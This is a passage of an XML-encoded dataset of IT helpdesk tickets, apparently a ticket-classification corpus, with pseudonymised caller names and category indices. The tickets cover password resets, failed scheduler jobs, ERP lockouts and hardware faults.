    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job Job_2668 failed in job_scheduler at: 10/17/2016 12:06:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="7"/>
  </r>
  <r>
    <s v="help with programdnty nx9"/>
    <s v="hi , _x000a__x000a_we need your help with programdnty nx9. when the users tiaghry santhuy and pvimkcfw sarxkfvj click in gkad the nx close._x000a__x000a_can we do make something to solve this problem?_x000a__x000a_"/>
    <s v="pvimkcfw sarxkfvj"/>
    <x v="45"/>
  </r>
  <r>
    <s v="crm add in will not come up"/>
    <s v="crm add in will not come up"/>
    <s v="aqyjewmf ceksapdw"/>
    <x v="0"/>
  </r>
  <r>
    <s v="analysis not working to run my quote reports. it is not showing in my tool bar."/>
    <s v="when i try to open through erp business analysis it gives error. the launcher is exited with error. analysis add in is not registered correctly."/>
    <s v="gdpxqyhj iapghvke"/>
    <x v="8"/>
  </r>
  <r>
    <s v="password reset request for erp"/>
    <s v="_x000a__x000a_received from: irqpwgtn.dpautgeh@gmail.com_x000a__x000a_dear sir,_x000a__x000a_please reset password as it is failed to logon. as i had changed the password_management_tool password due to expiry which results in this problem._x000a__x000a_user name: schyhty_x000a_emp id: 2027646758_x000a__x000a_[cid:image001.jpg@01d228b9.e1e4e160]_x000a__x000a_with best "/>
    <s v="irqpwgtn dpautgeh"/>
    <x v="0"/>
  </r>
  <r>
    <s v="flash player update issue"/>
    <s v="flash player update issue"/>
    <s v="pbrmgyzo hzoxdijn"/>
    <x v="0"/>
  </r>
  <r>
    <s v="folder access rqeuest : ldgm003 i:\lean"/>
    <s v="contact :_x000a_need read/write access to folder ldgm003 i:\lean_x000a_network path : \\HostName_835\public\lean : read and write access "/>
    <s v="gjbcengineering_tooll gidsekfo"/>
    <x v="11"/>
  </r>
  <r>
    <s v="erp prtgghj4k password reset"/>
    <s v="erp prtgghj4k password reset"/>
    <s v="zfebmujk mtdzqjue"/>
    <x v="19"/>
  </r>
  <r>
    <s v="needs to change password "/>
    <s v="needs to change password "/>
    <s v="tqvpohwj tbkywpqz"/>
    <x v="0"/>
  </r>
  <r>
    <s v="windows account unlock"/>
    <s v="windows account unlock"/>
    <s v="zidcxslw clyfdaki"/>
    <x v="0"/>
  </r>
  <r>
    <s v="forward bcxfhekz bplfrnis's emails to zneyrlhg bfiwanze"/>
    <s v="bcxfhekz bplfrnis (2118145) exited the company and we need to forward bcxfhekz bplfrnis's emails to zneyrlhg bfiwanze effective immediately._x000d__x000a_"/>
    <s v="zneyrlhg bfiwanze"/>
    <x v="26"/>
  </r>
  <r>
    <s v="cothyshy has access to the above link. she can edit. but whenever she saves it she does not receive the email confirmation"/>
    <s v="telephone:_x000a_summary:i have completed a nda for alarm systems but am not receiving the emailed response with link to the form.  _x000a__x000a__x000a_cothyshy has access to the above link. she can edit. but whenever she saves it she does not receive the email confirmation/ copy._x000a_"/>
    <s v="avglmrts vhqmtiua"/>
    <x v="15"/>
  </r>
  <r>
    <s v="job Job_2668 failed in job_scheduler at: 10/17/2016 10:06:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job Job_2668 failed in job_scheduler at: 10/17/2016 10:06:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="29"/>
  </r>
  <r>
    <s v="icloud account is synched with outlook. need to delete it."/>
    <s v="icloud account is synched with outlook. need to delete it."/>
    <s v="aguxobqs upgtdafh"/>
    <x v="0"/>
  </r>
  <r>
    <s v="erp SID_34 account locked out."/>
    <s v="erp SID_34 account locked out."/>
    <s v="jmsaopew dnuvpfci"/>
    <x v="0"/>
  </r>
  <r>
    <s v="erp SID_34 password change"/>
    <s v="name:bettymcdanghtnuell_x000a_language:_x000a_browser:microsoft internet explorer_x000a_email:mcdythanbm@company.com_x000a_customer number:_x000a_telephone:_x000a_summary:iam locked out of erp tried to change password and got locked out"/>
    <s v="vwaejqrh kmtvyesb"/>
    <x v="0"/>
  </r>
  <r>
    <s v="new employee phone number needed"/>
    <s v="_x000a_summary:new employee phone number needed_x000a_"/>
    <s v="oqbstujm sutjvker"/>
    <x v="2"/>
  </r>
  <r>
    <s v="cannot connect pvn"/>
    <s v="_x000d__x000a__x000d__x000a_received from: aqrhwjgo.cyelqkvs@gmail.com_x000d__x000a__x000d__x000a_dear it team,_x000d__x000a__x000d__x000a_i cannot connect below link. it is long download it and as below screen. please help._x000d__x000a__x000d__x000a_users can access vpn (_x000d__x000a__x000d__x000a_[cid:image001.png@01d228b7.02ba5da0]_x000d__x000a__x000d__x000a_best "/>
    <s v="aqrhwjgo cyelqkvs"/>
    <x v="49"/>
  </r>
  <r>
    <s v="server HostName_858 automatically cancelled backup"/>
    <s v="received the following email for the last two backups: the job was automatically canceled because it exceeded the job's maximum configured run time. backup server is HostName_858._x000d__x000a__x000d__x000a_stefyty dabhruji is currently assisting."/>
    <s v="mlckvyfq aonlxvwb"/>
    <x v="11"/>
  </r>
  <r>
    <s v="mobile device activation."/>
    <s v="mobile device activation."/>
    <s v="detboaws rvuelfci"/>
    <x v="0"/>
  </r>
  <r>
    <s v="i cannot access the planner app in owa"/>
    <s v="name:giuliasana byhdderni_x000a_language:_x000a_browser:microsoft internet explorer_x000a_email:ajnpuqym.gvoncems@gmail.com_x000a_customer number:_x000a_telephone:_x000a_summary:i cannot access the planner app in owa"/>
    <s v="ajnpuqym gvoncems"/>
    <x v="0"/>
  </r>
  <r>
    <s v="password expired // unable to change the password"/>
    <s v="password expired // unable to change the password"/>
    <s v="phvgbire ekbhqcap"/>
    <x v="0"/>
  </r>
  <r>
    <s v="password reset  through password_management_tool password manager/collaboration_platform issue "/>
    <s v="_x000a_summary:i am having difficulty changing my password for usa company through the password_management_tool id system. please assist. "/>
    <s v="ferxqvsm esmwxqlf"/>
    <x v="0"/>
  </r>
  <r>
    <s v="unable to access collaboration_platform"/>
    <s v="_x000d__x000a__x000d__x000a_received from: mfizgpoy.akbvznci@gmail.com_x000d__x000a__x000d__x000a_hello,_x000d__x000a__x000d__x000a_i would like to gain access to this link: _x000d__x000a__x000d__x000a_i am trying to complete an lagp request for one of my customers. this is the error i'm receiving._x000d__x000a_[cid:image001.png@01d22855.aac9f8a0]_x000d__x000a__x000d__x000a_"/>
    <s v="mfizgpoy akbvznci"/>
    <x v="15"/>
  </r>
  <r>
    <s v="ticket update - inplant_870028"/>
    <s v="ticket update - inplant_870028"/>
    <s v="olckhmvx pcqobjnd"/>
    <x v="0"/>
  </r>
  <r>
    <s v="branding site"/>
    <s v="_x000a__x000a_received from: jefguyza.mkhwcnes@gmail.com_x000a__x000a_hello, i can not open our branding site, i receive following error message in internet explorer:_x000a__x000a_make sure the web address _x000a_(i am on vpn)_x000a_ syhtu pozdrsavom / mit freundlichem gruss / best "/>
    <s v="jefguyza mkhwcnes"/>
    <x v="15"/>
  </r>
  <r>
    <s v="getting an error when trying to access the precall planning reports and cmor see attached"/>
    <s v="keinyujo torvxeda can not access the pre call planning section of the account record.  he gets an error that is the same as the one he gets for his reporting_engineering_tool on the crm dashbankrd.  it fixed once, but when i opened crm again, same issue happened"/>
    <s v="keinyujo torvxeda"/>
    <x v="0"/>
  </r>
  <r>
    <s v="costing issue for material 6526474  in plant_316 plant "/>
    <s v="_x000d__x000a__x000d__x000a_received from: aytjedki.rucfxpla@gmail.com_x000d__x000a__x000d__x000a_hi can some help me with a costing issue?_x000d__x000a__x000d__x000a_mm6526474 this is a part that is made at plant_327 and was extended to plant_316. as you can see the cost at plant_316 is at 21.83 and 12.39 usd. i think that the 21.83 is incorrect._x000d__x000a_when i try to cost this part it is coming in at the 21.83 on the ppc1 and 12.38 on the gpc1 with an warning message of mat. 6526474 in plant plant_316: itemization does not match cost component split_x000d__x000a_i am not sure as to what i need to do to correct this. can you help?_x000d__x000a__x000d__x000a_plant_327 cost is at 16.12 cad_x000d__x000a__x000d__x000a__x000d__x000a_[cid:image004.png@01d2284d.2ff23140]_x000d__x000a__x000d__x000a__x000d__x000a__x000d__x000a_[cid:image002.png@01d2284c.febc1410]_x000d__x000a__x000d__x000a__x000d__x000a__x000d__x000a_best "/>
    <s v="aytjedki rucfxpla"/>
    <x v="43"/>
  </r>
  <r>
    <s v="erp SID_34 locked."/>
    <s v="erp SID_34 locked."/>
    <s v="hfpkmiwn wcxrfani"/>
    <x v="0"/>
  </r>
  <r>
    <s v="dedalus report on pdf blocked."/>
    <s v="_x000a_summary:cannot open downloaded dedalus report on pdf. this was reported on several collegues when downloading and opening this particular report."/>
    <s v="cqwtksbu tgxockrn"/>
    <x v="0"/>
  </r>
  <r>
    <s v="push-out reports"/>
    <s v="_x000d__x000a__x000d__x000a_received from: ctzykflo.evzbhgru@gmail.com_x000d__x000a__x000d__x000a_dear all,_x000d__x000a__x000d__x000a_i just got the information that since last wednesday rkyjnbqh kfshormi â€“ a sales engineer â€“ didn't receive any push-out reports like_x000d__x000a_the open quote report etc._x000d__x000a__x000d__x000a_can someone please check and let us know what happens._x000d__x000a__x000d__x000a_"/>
    <s v="ctzykflo evzbhgru"/>
    <x v="8"/>
  </r>
  <r>
    <s v="urgent : local server down HostName_1326"/>
    <s v="error : windows cannot access \\HostName_1326&quot;_x000a_red cross on the drives in the server._x000a_user has access to server. it has worked before._x000a_contact : _x000a_it has impacted our quoting team, design team, and manufacturing (usa plant)"/>
    <s v="ewsybazi otkuaxhw"/>
    <x v="11"/>
  </r>
  <r>
    <s v="unable to open business_client // install .net framdntyework 4.5"/>
    <s v="unable to open business_client // install .net framdntyework 4.5"/>
    <s v="ewotmgpx xkalcwsz"/>
    <x v="0"/>
  </r>
  <r>
    <s v="network drive not loading"/>
    <s v="network drive not loading"/>
    <s v="lagqkmto xqtldrcs"/>
    <x v="11"/>
  </r>
  <r>
    <s v="weekly sales activity reports"/>
    <s v="_x000a__x000a_received from: mnlvhtug.imvetgoa@gmail.com_x000a__x000a_i didn't receive any sales activity order reports from publications@company.com for this past weekâ€¦_x000a__x000a_mnlvhtug imvetgoa_x000a_sr. application engineer_x000a_general engineering_x000a_company inc._x000a_mnlvhtug.imvetgoa@gmail.com&lt;mailto:mnlvhtug.imvetgoa@gmail.com&gt;_x000a_[cid:image001.png@01d15842.000812f0]_x000a__x000a__x000a__x000a__x000a__x000a__x000a_"/>
    <s v="mnlvhtug imvetgoa"/>
    <x v="0"/>
  </r>
  <r>
    <s v="skype"/>
    <s v="_x000d__x000a__x000d__x000a_received from: btvmxdfc.yfahetsc@gmail.com_x000d__x000a__x000d__x000a_hello,_x000d__x000a__x000d__x000a_i'm facing some problems to join conference calls by skype._x000d__x000a_when i access i'm the only one in the call._x000d__x000a__x000d__x000a_"/>
    <s v="btvmxdfc yfahetsc"/>
    <x v="27"/>
  </r>
  <r>
    <s v="rechner fÃ¼r EU_tool stÃ¤be hÃ¤ngt sich auf .\spdczoth vajtodny"/>
    <s v="rechner fÃ¼r EU_tool stÃ¤be hÃ¤ngt sich auf .\spdczoth vajtodny"/>
    <s v="spdczoth vajtodny"/>
    <x v="24"/>
  </r>
  <r>
    <s v="reset passwords for ldmwqubi sovqeynk using password_management_tool password reset."/>
    <s v="forgot password for erp login"/>
    <s v="ldmwqubi sovqeynk"/>
    <x v="16"/>
  </r>
  <r>
    <s v="not able to open single sign on portal on hub "/>
    <s v="not able to open single sign on portal on hub "/>
    <s v="zqyikobt ufxamgwr"/>
    <x v="0"/>
  </r>
  <r>
    <s v="rechner fÃ¼r infostand defekt \probleme mit lÃ¼fter \niptbwdq csenjruz"/>
    <s v="rechner fÃ¼r infostand defekt \probleme mit lÃ¼fter \niptbwdq csenjruz"/>
    <s v="niptbwdq csenjruz"/>
    <x v="24"/>
  </r>
  <r>
    <s v="wir brauchen usb-stick (16gb) fÃ¼r 1.lehrjahr (4 stÃ¼ck)."/>
    <s v="hallo ,_x000a__x000a_wir brauchen usb-stick (16gb) fÃ¼r 1.lehrjahr (4 stÃ¼ck)._x000a__x000a_"/>
    <s v="dknejifu dljvtebc"/>
    <x v="24"/>
  </r>
  <r>
    <s v="not able to submit lean tracker in collaboration_platform"/>
    <s v="not able to submit lean tracker in collaboration_platform"/>
    <s v="eudkoiny zfwtoiun"/>
    <x v="0"/>
  </r>
  <r>
    <s v="outlook- skype  problem"/>
    <s v="_x000d__x000a__x000d__x000a_received from: cspkeyza.bzpyfcki@gmail.com_x000d__x000a__x000d__x000a_hello team ,_x000d__x000a__x000d__x000a_i can not open outlook and skype in my pc, it gives an error like this_x000d__x000a__x000d__x000a__x000d__x000a_[cid:b711608e-db1e-449e-bb73-e6c73c32c540]_x000d__x000a__x000d__x000a__x000d__x000a_"/>
    <s v="cspkeyza bzpyfcki"/>
    <x v="0"/>
  </r>
  <r>
    <s v="unable to get to password_management_tool to change the password"/>
    <s v="unable to get to password_management_tool to change the password"/>
    <s v="lxmpfiez katjygbp"/>
    <x v="0"/>
  </r>
  <r>
    <s v="vpn is suddenly not accepting credentials."/>
    <s v="vpn is suddenly not accepting credentials."/>
    <s v="ubqiygva zdkfxyel"/>
    <x v="0"/>
  </r>
  <r>
    <s v="erp SID_34 account unlock"/>
    <s v="erp SID_34 account unlock"/>
    <s v="vwaejqrh kmtvyesb"/>
    <x v="0"/>
  </r>
  <r>
    <s v="in pm_tool_for_sd i can not upload projects to erp ."/>
    <s v="please see the attached jpg file that show the message from pm_tool_for_sd."/>
    <s v="jghqolyd cydthpjv"/>
    <x v="25"/>
  </r>
  <r>
    <s v="account locked."/>
    <s v="account locked."/>
    <s v="ewvibrfg atlurzdn"/>
    <x v="0"/>
  </r>
  <r>
    <s v="job Job_3028 failed in job_scheduler at: 10/17/2016 06:46:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job Job_3028 failed in job_scheduler at: 10/17/2016 06:46:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="11"/>
  </r>
  <r>
    <s v="bobj webi publications services are not running."/>
    <s v="all the bobj webi publications have failed over the weekend. the services are still not working."/>
    <s v="froajhdb ijetmkuc"/>
    <x v="13"/>
  </r>
  <r>
    <s v="pending pr status &amp; workflow details of approver"/>
    <s v="_x000a__x000a_received from: ilbkhgxd.hirsqytd@gmail.com_x000a__x000a_help desk_x000a__x000a_there are 2 pr which are pending more than 10 &amp; 15 days which are yet to release by i1. please find the screen shot for both the pr's as below._x000a__x000a_[cid:image007.png@01d22886.3e109ad0][cid:image008.png@01d22886.3e109ad0]_x000a__x000a_[cid:image009.png@01d22886.3e109ad0][cid:image010.png@01d22886.3e109ad0]_x000a__x000a__x000a__x000a_but when it is checked in work flow of approver's (user id : jagtgarthy), nothing is pending. screen shot is attached for the same._x000a_[cid:image001.jpg@01d22886.3e3b7b60]_x000a__x000a_please verify the details for not appearing in the work flow of approver's._x000a__x000a_"/>
    <s v="ilbkhgxd hirsqytd"/>
    <x v="29"/>
  </r>
  <r>
    <s v="job Job_1142 failed in job_scheduler at: 10/17/2016 06:06:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job Job_1142 failed in job_scheduler at: 10/17/2016 06:06:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="8"/>
  </r>
  <r>
    <s v="re: ticket_no1558511 -- comments added"/>
    <s v="_x000a__x000a_received from: stdiondwd.rawdwu@company.com_x000a__x000a_hello dwight,_x000a__x000a_any update on this?_x000a__x000a__x000a_"/>
    <s v="kmnsvzuq euyvihzc"/>
    <x v="0"/>
  </r>
  <r>
    <s v="HostName_1013 stibo server physical drive and power supply issue. "/>
    <s v="HostName_1013 stibo server physical drive and power supply issue. "/>
    <s v="rkupnshb gsmzfojw"/>
    <x v="7"/>
  </r>
  <r>
    <s v="not able to open drtawings in pdf"/>
    <s v="not able to open drtawings in pdf"/>
    <s v="uxpytsdk kyamilds"/>
    <x v="0"/>
  </r>
  <r>
    <s v="bobj - not working"/>
    <s v="_x000d__x000a__x000d__x000a_received from: ctzykflo.evzbhgru@gmail.com_x000d__x000a__x000d__x000a_dear all,_x000d__x000a__x000d__x000a_all reports under bob information spaces like the product management report and quota report and others are missing._x000d__x000a__x000d__x000a_you simply get an empty screen. other users report the same problem._x000d__x000a__x000d__x000a_can you please fix the issue._x000d__x000a__x000d__x000a_"/>
    <s v="ctzykflo evzbhgru"/>
    <x v="0"/>
  </r>
  <r>
    <s v="volume: c:\ label:sys-amssm003 94ef9088 on server: is over 85% consumed"/>
    <s v="volume: c:\ label:sys-amssm003 94ef9088 on server: is over _x000d__x000a_85% space consumed. space available: 2.1 g "/>
    <s v="jloygrwh acvztedi"/>
    <x v="11"/>
  </r>
  <r>
    <s v="job Job_3181 failed in job_scheduler at: 10/17/2016 05:00:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job Job_3181 failed in job_scheduler at: 10/17/2016 05:00:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="9"/>
  </r>
  <r>
    <s v="loaner laptop germany location required "/>
    <s v="_x000a__x000a_received from: ubiqcrvy.mxjcnqfs@gmail.com_x000a__x000a_hi it-team,_x000a__x000a_i would please need two loaner laptops ( location: germany) from november 21th-22th november 2016 for visitors/consultant from bank who`s name are rtbkimey cfsqwtdv and xikojdym rgazclmi. the consultant will finish a huge update for our erp payment management and autobank tool._x000a__x000a_cost center: fuf02756_x000a__x000a_"/>
    <s v="ubiqcrvy mxjcnqfs"/>
    <x v="28"/>
  </r>
  <r>
    <s v="not able to see sny information spaces n bobj prod server"/>
    <s v="not able to see sny information spaces n bobj prod server"/>
    <s v="xagyhbio jvrdnpkh"/>
    <x v="13"/>
  </r>
  <r>
    <s v="reset the password for mdvlkbac uhefoqtg on erp / production / erp"/>
    <s v="please unlock the account ( hanx123 ) and reset password for me , "/>
    <s v="mdvlkbac uhefoqtg"/>
    <x v="0"/>
  </r>
  <r>
    <s v="set up hand phone for email"/>
    <s v="_x000d__x000a__x000d__x000a_received from: ynsqjehx.kqgrsawl@gmail.com_x000d__x000a__x000d__x000a_hi it team,_x000d__x000a__x000d__x000a_i'd like to set up my hand set samsung i9305 for my company outlook emails._x000d__x000a_pls offer assistance._x000d__x000a__x000d__x000a_best "/>
    <s v="ynsqjehx kqgrsawl"/>
    <x v="0"/>
  </r>
  <r>
    <s v="im not able to login to SID_32 system.plese look into this on priority.my user id : venktyamk12"/>
    <s v="im not able to login to SID_32 system.plese look into this on priority.my user id is venktyamk12"/>
    <s v="pxsghrjd wiehqmka"/>
    <x v="19"/>
  </r>
  <r>
    <s v="fe10 å¤å°å‡ºæ¥çº¸å¼ æ–‡å­—ä¸æ¸…æ™°"/>
    <s v="fe10 å¤å°å‡ºæ¥çº¸å¼ æ–‡å­—ä¸æ¸…æ™°"/>
    <s v="omatlyrd bvraipdt"/>
    <x v="30"/>
  </r>
  <r>
    <s v="probleme mit benutzer erneut nur temporÃ¤r! \merdivan \xwirzvda okhyipgr"/>
    <s v="probleme mit benutzer erneut nur temporÃ¤r! \merdivan \xwirzvda okhyipgr"/>
    <s v="xwirzvda okhyipgr"/>
    <x v="24"/>
  </r>
  <r>
    <s v="anmeldefehler lync \qidgvtwa qvbutayx"/>
    <s v="anmeldefehler lync \qidgvtwa qvbutayx"/>
    <s v="qidgvtwa qvbutayx"/>
    <x v="24"/>
  </r>
  <r>
    <s v="dvi schnittstelle ohne funktion."/>
    <s v="dvi schnittstelle ohne funktion. vermutlich grafikkarte defekt. "/>
    <s v="iqwymodv gbarydmw"/>
    <x v="41"/>
  </r>
  <r>
    <s v="EU_tool funktioniert nicht"/>
    <s v="fehlermeldung:  systemfehler &amp;h91115116 (). unbekannter fehler"/>
    <s v="cieagtub vwyzjlqm"/>
    <x v="25"/>
  </r>
  <r>
    <s v="my engineering tool is not taking new password. it is showing number of failed attempts exceeded."/>
    <s v="name:syhunil krishnyhda_x000a_language:_x000a_browser:microsoft internet explorer_x000a_email:mpvasqwy.rotkyeja@gmail.com_x000a_customer number:_x000a_telephone:_x000a_summary:i changed my password from password_management_tool password. unlocked all accounts. my engineering tool is not taking new password. it is showing number of failed attempts exceeded."/>
    <s v="mpvasqwy rotkyeja"/>
    <x v="0"/>
  </r>
  <r>
    <s v="bob j"/>
    <s v="hello,_x000d__x000a__x000d__x000a_bob-j geht wieder mal nicht._x000d__x000a_haben wir einen systemfehler?_x000d__x000a__x000d__x000a_bob j goes back not even._x000d__x000a_do we have a system failure?_x000d__x000a_ _x000d__x000a__x000d__x000a_mit freundlichen grÃ¼ÃŸen_x000d__x000a_best "/>
    <s v="gmneclxj czqthmrs"/>
    <x v="0"/>
  </r>
  <r>
    <s v="unable to create delivery-35934304/item 70"/>
    <s v="please provide the following:_x000d__x000a__x000d__x000a_what order number?   35934304_x000d__x000a__x000d__x000a_what material or item number?  3114712_x000d__x000a__x000d__x000a_what warehouse location? plant_283_x000d__x000a__x000d__x000a_issue description / error message?  cannot run d/n although plant_283 has 1 pcs stock  "/>
    <s v="hrqvkemg dmcxbrqj"/>
    <x v="5"/>
  </r>
  <r>
    <s v="æ›´æ›å¯†ç¢¼å¾Œ, company connectå¯ç™»å…¥,ä½†ç„¡æ³•ä½¿ç”¨"/>
    <s v="æ›´æ›å¯†ç¢¼å¾Œ, company connectå¯ç™»å…¥,ä½†ç„¡æ³•ä½¿ç”¨"/>
    <s v="zhpwcdea cboefuis"/>
    <x v="0"/>
  </r>
  <r>
    <s v="job Job_1332 failed in job_scheduler at: 10/17/2016 02:26:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job Job_1332 failed in job_scheduler at: 10/17/2016 02:26:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="8"/>
  </r>
  <r>
    <s v="item on sales order not pulling through to picking slip"/>
    <s v="_x000d__x000a__x000d__x000a_received from: htnvbwxs.gwfrzuex@gmail.com_x000d__x000a__x000d__x000a_good day._x000d__x000a__x000d__x000a_please help with the following:_x000d__x000a__x000d__x000a_we have an issue on the below sales order:_x000d__x000a__x000d__x000a_[cid:image001.png@01d2284d.f0e9c250]_x000d__x000a__x000d__x000a_the first line item is not pulling through to the picking slip:_x000d__x000a__x000d__x000a_[cid:image002.png@01d2284d.f0e9c250]_x000d__x000a__x000d__x000a_please assist._x000d__x000a__x000d__x000a_"/>
    <s v="htnvbwxs gwfrzuex"/>
    <x v="12"/>
  </r>
  <r>
    <s v="r126 pc def. evtl. netzgerÃ¤t "/>
    <s v="r126 pc def. evtl. netzgerÃ¤t "/>
    <s v="fasirxzo xlvnhptm"/>
    <x v="32"/>
  </r>
  <r>
    <s v="keine datenÃ¼bertragung erp datenbank zu tintenstrahldrucker imaje  "/>
    <s v="bitte sofort lokalen it support smpijawb eawkpgqf vor ort schicken um fehler zu analysieren_x000a_komplette auslieferung des werkes germany steht!!!!!!!"/>
    <s v="cwrikael oanmsecr"/>
    <x v="41"/>
  </r>
  <r>
    <s v="EU_tool performance is very low again"/>
    <s v="as in the last weeks, the EU_tool performance is verly low in germany (plant_197)."/>
    <s v="pmweoxyq zrkjnydi"/>
    <x v="25"/>
  </r>
  <r>
    <s v="not able to submit lean tracker"/>
    <s v="not able to submit lean tracker"/>
    <s v="ilbkhgxd hirsqytd"/>
    <x v="0"/>
  </r>
  <r>
    <s v="EU_tool und chargenverwaltung geht nicht."/>
    <s v="EU_tool und chargenverwaltung geht nicht."/>
    <s v="ctixyzku jitrahgx"/>
    <x v="25"/>
  </r>
  <r>
    <s v="file scanning problem in richoscan-wy14  "/>
    <s v="from: yotyhga narthdyhy _x000a_sent: monday, october 17, 2016 10:51 am_x000a_to: nwfodmhc exurcwkm_x000a_subject:  - fw: file scanning problem in richoscan-wy14 _x000a__x000a_kindly request you to it,_x000a__x000a_previous this folder is in m drive directly mtb-1st floor-richoscan-wy14  and now somebody have moved this to mtb-1st floor-richoscan-wy15.  please correct this and now not able to scan the files to mtb-1st floor-richoscan-wy14._x000a__x000a_"/>
    <s v="vwhkldyp efblthqc"/>
    <x v="11"/>
  </r>
  <r>
    <s v="EU_tool ausfall in germany"/>
    <s v="keine rÃ¼ckmeldungen und zuteillisten mÃ¶glich"/>
    <s v="vumbyikw kqsiougd"/>
    <x v="25"/>
  </r>
  <r>
    <s v="serverprobleme qm-soft nicht anwendbar"/>
    <s v="serverprobleme qm-soft nicht anwendbar"/>
    <s v="qkedpfyj qechgaty"/>
    <x v="25"/>
  </r>
  <r>
    <s v="battery not charging when the power adapter is connected."/>
    <s v="battery not charging when the power adapoter is connected._x000a_-when the power adaptor is unpliugged , the batter is not detected._x000a_system: latitude e5440_x000a_service tag: hvzlqthr12 | express service code: 38567939551238 _x000a_-installed the power system bios ._x000a_-restarted the pc and checked still the same issue._x000a_-issue with the battery.needs replacement._x000a_-contact : "/>
    <s v="mcphgvnb bdegqtyj"/>
    <x v="18"/>
  </r>
  <r>
    <s v="computer will not turn on."/>
    <s v="the computer 5lthyqzns1 service code 1276199035169 will not turn on at all.  tried changing elengineering toolical plug and had no effect.  the fan to the computer will not turn on either._x000a_contact: gordon leach/xernsfqa uzvsnlbd number "/>
    <s v="xbhqcayd smkbuphw"/>
    <x v="18"/>
  </r>
  <r>
    <s v="reset passwords for cubdsrml znewqgop using password_management_tool password reset."/>
    <s v="the"/>
    <s v="cubdsrml znewqgop"/>
    <x v="16"/>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nmujidyk suylrqbi"/>
    <x v="0"/>
  </r>
  <r>
    <s v="printer offline (see attachment)"/>
    <s v="printer offline (see attachment)"/>
    <s v="ryaudfxm shjdaolm"/>
    <x v="41"/>
  </r>
  <r>
    <s v="job hr_payroll_na_u6 failed in job_scheduler at: 10/17/2016 00:02:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job hr_payroll_na_u6 failed in job_scheduler at: 10/17/2016 00:02:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="7"/>
  </r>
  <r>
    <s v="job hr_payroll_na_u1 failed in job_scheduler at: 10/17/2016 00:02:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job hr_payroll_na_u1 failed in job_scheduler at: 10/17/2016 00:02:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="7"/>
  </r>
  <r>
    <s v="job hr_payroll_na_u2 failed in job_scheduler at: 10/17/2016 00:02:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job hr_payroll_na_u2 failed in job_scheduler at: 10/17/2016 00:02:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="7"/>
  </r>
  <r>
    <s v="login issue erp SID_34"/>
    <s v="login issue erp SID_34_x000d__x000a_-user getting &quot;logon balancing error - 88._x000d__x000a_-advised the user to check if he is on the company network._x000d__x000a_-advised the user to login and check._x000d__x000a_-caller confirmed that she was able to login._x000d__x000a_-issue resolved."/>
    <s v="fqhlvcxn zdfymgjp"/>
    <x v="0"/>
  </r>
  <r>
    <s v="dn 9169508476,t/o 642392"/>
    <s v="_x000d__x000a__x000d__x000a_received from: gjtyswkb.dpvaymxr@gmail.com_x000d__x000a__x000d__x000a_dear it,_x000d__x000a__x000d__x000a_we can not do z_chk for dn 9169508476,pls help to check it, it's urgent, "/>
    <s v="gjtyswkb dpvaymxr"/>
    <x v="5"/>
  </r>
  <r>
    <s v="cannot review stock at mdw04 // mm 6720004 "/>
    <s v="_x000d__x000a__x000d__x000a_received from: aqrhwjgo.cyelqkvs@gmail.com_x000d__x000a__x000d__x000a_dear it team,_x000d__x000a__x000d__x000a_i just complete gr for dn 9168073012_mm 6720004 but there is not stock available on md04. please advise because i would like to ship to customer 5 pcs today._x000d__x000a__x000d__x000a_[cid:image001.png@01d22863.386174b0]_x000d__x000a__x000d__x000a_best "/>
    <s v="aqrhwjgo cyelqkvs"/>
    <x v="5"/>
  </r>
  <r>
    <s v="cannot review stock at mdw04 // mm 6720004 "/>
    <s v="_x000d__x000a__x000d__x000a_received from: aqrhwjgo.cyelqkvs@gmail.com_x000d__x000a__x000d__x000a_dear it team,_x000d__x000a__x000d__x000a_i just complete gr for dn 9168073012_mm 6720004 but there is not stock available on md04. please advise because i would like to ship to customer 5 pcs today._x000d__x000a__x000d__x000a_[cid:image001.png@01d22863.386174b0]_x000d__x000a__x000d__x000a_best "/>
    <s v="aqrhwjgo cyelqkvs"/>
    <x v="0"/>
  </r>
  <r>
    <s v="access to network drive and printer"/>
    <s v="_x000a__x000a_received from: sxnzacoj.lwvqgfby@gmail.com_x000a__x000a_please provide access to following to mr. akirtyethsyd (user id: vvsthryomaa)_x000a__x000a__x000a__x000a_1.       \\aswyuysm003\mtbelengineering toolical_production&lt;file:///\\aswyuysm003\mtbelengineering toolical_production&gt; (read write)_x000a__x000a_2.       \\HostName_95\mtbu_ele&lt;file:///\\HostName_95\mtbu_ele&gt; (read only)_x000a__x000a_3.       printer wy14_x000a__x000a_"/>
    <s v="sxnzacoj lwvqgfby"/>
    <x v="11"/>
  </r>
  <r>
    <s v="job hr_payroll_na_u2 failed in job_scheduler at: 10/16/2016 23:00:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job hr_payroll_na_u2 failed in job_scheduler at: 10/16/2016 23:00:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="9"/>
  </r>
  <r>
    <s v="job hr_payroll_na_u6 failed in job_scheduler at: 10/16/2016 23:00:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job hr_payroll_na_u6 failed in job_scheduler at: 10/16/2016 23:00:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="9"/>
  </r>
  <r>
    <s v="job hr_payroll_na_u1 failed in job_scheduler at: 10/16/2016 23:00:00  "/>
